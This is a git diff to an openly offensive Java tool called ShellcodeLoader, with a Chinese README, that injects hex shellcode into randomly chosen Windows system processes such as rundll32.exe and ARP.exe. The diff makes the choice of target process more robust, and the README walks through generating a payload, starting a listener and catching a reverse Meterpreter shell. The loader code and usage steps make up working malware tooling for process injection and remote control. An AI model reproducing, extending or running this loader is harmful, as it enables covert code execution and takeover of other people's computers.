diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4544264
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,33 @@
+# Compiled class file
+*.class
+
+# Eclipse
+.project
+.classpath
+.settings/
+
+# Intellij
+*.ipr
+*.iml
+*.iws
+.idea/
+.vscode/
+
+# Maven
+target/
+
+# Gradle
+build
+.gradle
+
+# Log file
+*.log
+log/
+
+# out
+**/out/
+
+# Mac
+.DS_Store
+
+temp/
\ No newline at end of file
diff --git a/README.md b/README.md
index 8e8ae23..f05406e 100644
--- a/README.md
+++ b/README.md
@@ -10,9 +10,7 @@
## 编译
-当前版本使用的jna经过魔改,不支持maven编译。
-
-需要使用idea的构建工件功能进行打包,具体方法请咨询百度。
+maven package
## 使用
@@ -42,7 +40,7 @@ java -jar ShellcodeLoader.jar --x64 shellcode_hex
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
-fce88f0000006089e531d2648b5xxxx
+fce88f0000006089e531d2648b5....
```
然后开启监听
@@ -59,7 +57,7 @@ exploit -j
### 客户端
```
-java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx
+java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5....
```
即可收到反弹的Meterpreter
diff --git a/pom.xml b/pom.xml
index fda7eef..67f48ed 100644
--- a/pom.xml
+++ b/pom.xml
@@ -28,7 +28,13 @@
-
+
+ net.java.dev.jna
+ jna-platform
+ 1.2.0
+ system
+ ${project.basedir}/lib/tinyjna.jar
+
@@ -60,9 +66,9 @@
asexploits.ShellcodeLoader
-
- jar-with-dependencies
-
+
+ src/main/resources/assembly.xml
+
diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index a4eed6b..2e48247 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -12,13 +12,14 @@
import com.sun.jna.win32.StdCallLibrary;
import com.sun.jna.win32.W32APIOptions;
+import java.io.File;
import java.util.Random;
public class ShellcodeLoader {
static Kernel32 kernel32;
static IKernel32 iKernel32;
- public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
- public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\notepad.exe", "C:\\Windows\\System32\\ARP.EXE"};
+ public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
+ public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\fc.exe", "C:\\Windows\\System32\\ARP.EXE", "C:\\Windows\\System32\\expand.exe"};
static {
kernel32 = (Kernel32) Native.loadLibrary(Kernel32.class, W32APIOptions.UNICODE_OPTIONS);
@@ -53,24 +54,57 @@ public static void main(String[] args) {
jnaLoader.loadShellCode(shellcode, is64);
}
+ public void loadShellCode(String shellcodeHex) {
+ this.loadShellCode(shellcodeHex, false);
+ }
+
public void loadShellCode(String shellcodeHex, boolean is64) {
String[] targetProcessArray = null;
+ //打乱数组顺序
+ shuffleArray(ProcessArrayx64);
+ shuffleArray(ProcessArrayx32);
// java是64位且选择注入64位shellcode
if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
- targetProcessArray = ProcessArrayx64;
+ targetProcessArray = mergeArrays(ProcessArrayx64, ProcessArrayx32);
} else { //默认注入32位进程
- targetProcessArray = ProcessArrayx32;
+ targetProcessArray = mergeArrays(ProcessArrayx32, ProcessArrayx64);
+ }
+ String targetProcess = null;
+ for (int i = 0; i < targetProcessArray.length; i++) {
+ targetProcess = targetProcessArray[i];
+ if (new File(targetProcess).exists()) {
+ break;
+ }
}
- int j = targetProcessArray.length;
- byte b = 0;
- Random random = new Random();
- int k = b + random.nextInt(j);
- String targetProcess = targetProcessArray[k];
this.loadShellCode(shellcodeHex, targetProcess);
}
+ public static void shuffleArray(String[] arr) {
+ Random rand = new Random();
+ for (int i = arr.length - 1; i > 0; i--) {
+ int index = rand.nextInt(i + 1);
+ String temp = arr[i];
+ arr[i] = arr[index];
+ arr[index] = temp;
+ }
+ }
+
+ public static String[] mergeArrays(String[] a, String[] b) {
+ String[] c = new String[a.length + b.length];
+ int i = 0;
+ for (String s : a) {
+ c[i] = s;
+ i++;
+ }
+ for (String s : b) {
+ c[i] = s;
+ i++;
+ }
+ return c;
+ }
+
public void loadShellCode(String shellcodeHex, String targetProcess) {
System.out.println("targetProcess: " + targetProcess);
byte[] shellcode = hexStrToByteArray(shellcodeHex);
diff --git a/src/main/resources/assembly.xml b/src/main/resources/assembly.xml
new file mode 100644
index 0000000..0345be0
--- /dev/null
+++ b/src/main/resources/assembly.xml
@@ -0,0 +1,27 @@
+
+
+ jar-with-dependencies
+
+
+ jar
+
+
+ false
+
+
+
+ /
+ true
+ true
+ runtime
+
+
+
+
+ /
+ true
+ true
+ system
+
+
+
\ No newline at end of file